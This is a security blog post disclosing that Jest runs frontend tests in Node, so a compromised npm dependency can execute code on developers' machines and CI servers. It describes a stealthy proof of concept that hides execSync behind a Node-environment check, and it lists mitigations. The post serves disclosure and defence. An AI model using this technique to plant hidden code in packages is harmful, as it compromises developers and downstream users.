Another variant to compromise frontend developers by malicious packages
Some days ago I was watching 10 Things I Regret About Node.js and the introduction to Deno started with this slide about security.

By default a script should run without any network or file system write access
It makes sense and specially for the frontend realm where most of the time we’re developing code to be run in a browser and in a browser you don’t have i.e. file system write access.
In this post my target persona is going to be a frontend developer that develops code that will only run in the browser. It’s important to mention that it doesn’t take into account SSG or SSR since they could add more variants to consider (I’m going to comment on that later). In terms of execution, the frontend developer is executing the project as a user on the operating system (no container or virtual machine).
The developer trusts in the security mechanisms and boundaries integrated into the browser. Let’s take the case of a package, part of a project’s dependencies, that is compromised and in the new release it contains malicious code. Should the developer be worried about a malicious package trying to execute code in his local machine? The answer is yes.
In this post I’m going to review the known techniques so far, their mitigation measures and introduce another variant ( I couldn’t find a previous reference to it) to achieve code execution when a user runs the test suite. It was reported last May to Facebook Bug Bounty but according to them, it seems to be part of project’s features.
They gave me the OK to speak about it publicly
Threat analysis for frontend developers
Imagine there’s a malicious package in your dependencies and this package is used in your application. How many ways could you be pwned?
- At package installation by package scripts: it can be mitigated using
ignore-scripts
directive. - The malicious code gets executed when your application is running in the browser and it leads to client-side code execution (as in a Cross Site Scripting).
- Executing the malicious logic because it’s part of a script that you call locally using NodeJS.
- In the case of SSG/SSR, where some code is meant to run server side, you could be affected in the same way as a backend developer: a malicious package could achieve remote command execution on your local machine.
If you can think about some new scenarios, I’m open to update this list!
From my experience, the target persona could be affected mostly by the first two. The third case it’s not that common in simple setups and the fourth one is only applicable if you’re doing SSG/SSR, which is not the case for this example.
So this target persona could set the directive ignore-scripts
and any other impact of a malicious package would be at browser level. Is it enough? No, because there’s another less known variant that I want to introduce.
Code execution in the test suite
Nowadays most software projects have a test suite. When you use a utility like create-react-app to initialize a React application, it adds a test runner (Jest) and a little test suite. From the documentation about testing we can read:
Jest is a Node-based runner. This means that the tests always run in a Node environment and not in a real browser. This lets us enable fast iteration speed and prevent flakiness.
While Jest provides browser globals such as
window
thanks to jsdom, they are only approximations of the real browser behavior. Jest is intended to be used for unit tests of your logic and your components rather than the DOM quirks.
At first it was a bit confusing since Jest has a configuration option called testEnvironment that can be set to either jsdom
or node
. As it’s set to jsdom
by default, I thought that Jest used jsdom to execute the tests inside the environment created by jsdom but it’s not the case. Let’s see the security implications of that behavior.
We’re going to setup a React application using create-react-app. The steps are straightforward: npx create-react-app my-app && cd my-app
. We’re going to import a React component from a local file called external-package.js
and we can do the parallel with a third-party package since this import works in the same way (so from this point on we will call it external-package
). This is the content of external-package.js
:
It’s a not so useful component that creates a paragraph with hello
as text. Our App.js
file is going to import this external-package
component and make use of it in the application (line 3 and 10):
If we run the test suite, everything runs as expected (running it with CI=true
to not have an interactive run).

So now, what happens if external-package
is compromised? Our threat analysis tell us that it only could affect the application running on the browser, but the fact that Jest is running the code using node
means that the compromised package could contain some valid NodeJS logic that will be executed when the test suite runs. Let’s see it in practice.
To give some real-world context, imagine that until now we were using external-package-1.0.0
. An attacker manages to compromise the repository, publishes a new version external-package-1.0.1
and at some time we will update our local packages and get external-package-1.0.1
installed. The new version contains the following logic:
In comparison with version 1.0.0
, the attacker added lines 5 to 7. Line 5
checks that the script is being executed by node
and not by the browser. It’s an important check to achieve a stealth exploit, otherwise yarn start
service could warn us about errors in our application:

Our if
statement makes yarn start
work fine so our frontend developer doesn’t detect the malicious code. In line 6
we call NodeJS execSync function to execute id
command and we log to console the command’s output. Now, let’s run our test suite again:

Our id
command is executed. Obviously we can do it stealthy without that console.log
statement but it’s just a proof of concept to show that the exploit is working.
Impact
There are two scenarios where this attack could be carried out:
- A frontend developer running the test suite locally could lead to a full local account compromise.
- A continuous integration environment running the test suite and executing the malicious code.
I think everyone understand the scope of the first scenario. However, the second scenario is alarming: I’d like to refer to this blog post about the story of a backdoor in a project called Webmin:
The vulnerability was secretly planted by an unknown hacker who successfully managed to inject a BACKDOOR at some point in its build infrastructure that surprisingly persisted into various releases of Webmin (1.882 through 1.921) and eventually remained hidden for over a year.
Developers confirmed that the official Webmin downloads were replaced by the backdoored packages only on the project’s SourceForge repository, and not on the Webmin’s Github repositories.
So a branch of new cases could derive from malicious code being executed on CI environments:
- It could achieve persistent access to your CI infrastructure.
- It could insert malicious code in your releases so the number of affected people increase exponentially.
The worst is that this kind of attack is not easy to detect since that attack is being done on the CI servers and there’s no trails in the code repository.
Mitigation measures
From my point of view, I see some mitigation measures to put in place:
- For development, put your frontend application in a container and run the test suite inside the container.
- Use disposable containers to run your test suite in your CI environment so any malicious code will have a limited scope in both time and impact. Disable networking in case you don’t need it.
- To catch a compromised package: keep an eye on the commands executed, files accessed and network connections made by your test suite.
This list is not exhaustive but it’s a good starting point to improve your security posture.
Thoughts about security
About Jest’s behavior, I think it should be mentioned in the documentation because most people don’t consider this risk and then they won’t be able to take the right measures.
From my point of view, Deno is on the right path about the fact of using a secure sandbox to run the code (in this case the test suite). Looking at some online code editors, they mention that they run Jest on the browser so it would possible to run the test suite in a more secure manner.
In my opinion the issue is that there are two contexts, browser and server side, and each context should be handled separately or at least, with security primitives to ensure the expected boundaries.